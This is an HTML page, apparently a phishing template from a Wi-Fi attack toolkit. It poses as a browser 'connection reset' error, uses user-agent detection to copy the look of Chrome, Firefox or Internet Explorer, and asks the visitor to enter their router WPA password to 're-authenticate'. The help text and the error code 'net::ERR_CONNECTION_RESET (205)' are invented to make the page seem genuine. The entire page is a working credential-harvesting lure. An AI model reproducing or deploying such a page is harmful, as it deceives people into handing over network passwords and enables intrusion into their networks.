<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>Connection Reset</title>
        
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <script type="text/javascript">
            function toggleHelp() {
                var h = document.getElementById('help');
                if(h.style.display == 'block'){
                    h.style.display = 'none';
                }
                else{
                    h.style.display = 'block';
                }
            }
            var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
            var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
            if (is_chrome){
                document.write('<'+'link rel="stylesheet" type="text/css" href="chrome.css" />');
                document.write('<'+'link rel="icon" type="image/x-icon" href="icon/chrome_fav.ico" />');
            }
            else if (is_firefox){
                document.write('<'+'link rel="stylesheet" type="text/css" href="firefox.css" />')
                document.write('<'+'link rel="icon" type="image/x-icon" href="icon/firefox_fav.ico" />');
            }
            else{
                document.write('<'+'link rel="stylesheet" type="text/css" href="ie.css" />');
                document.write('<'+'link rel="icon" type="image/x-icon" href="icon/ie_fav.ico" />');
            }

            
        </script>
    </head>
    <body>
        <div id="center">
            <div id="center-left">
            <script>
                if (is_chrome)
                    document.write('<'+'img src="icon/chrome.png"/>');
                else if (is_firefox)
                    document.write('<'+'img src="icon/firefox.png"/>');
                else
                    document.write('<'+'img src="icon/ie.png"/>');
            </script>
            </div>
            <div id="center-right">
                <div id="title">Your connection has been reset</div>
                <br>
                <div id="content">Your router or gateway has reset your connection.
                                  You must re-authenticate to continue browsing.
                </div>
            </div>
            
            <div id="center-below">
                <form action="index.html" method="post">
                Router Password: &nbsp;&nbsp;<input type="password" name="wfphshr-wpa-password">
                <input id="btnSubmit" type="submit" value="Submit">
            </form></div>
            
            <br>
            <br>
            <a id="helpbutton" onclick="toggleHelp()" href="#">What is this?</a>
            <div id="help" style="display: none;">
                This message means that the connection between you and your wireless
                router was unexpectedly closed. Many things may cause this, but it is
                easily remedied by re-authenticating your PC with the network.
                
                If this has occurred previously, please contact your system administrator
                or service provider.
                <br><br>
                <div id="error">net::ERR_CONNECTION_RESET (205)</div>
            </div>
        </div>
    </body>
</html>
